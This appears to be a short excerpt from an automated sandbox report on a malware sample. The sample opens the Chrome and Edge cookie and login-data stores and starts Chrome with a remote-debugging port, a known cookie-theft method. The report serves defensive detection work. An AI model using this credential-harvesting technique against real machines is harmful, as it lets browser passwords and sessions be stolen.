Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Remote Access Functionality

Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP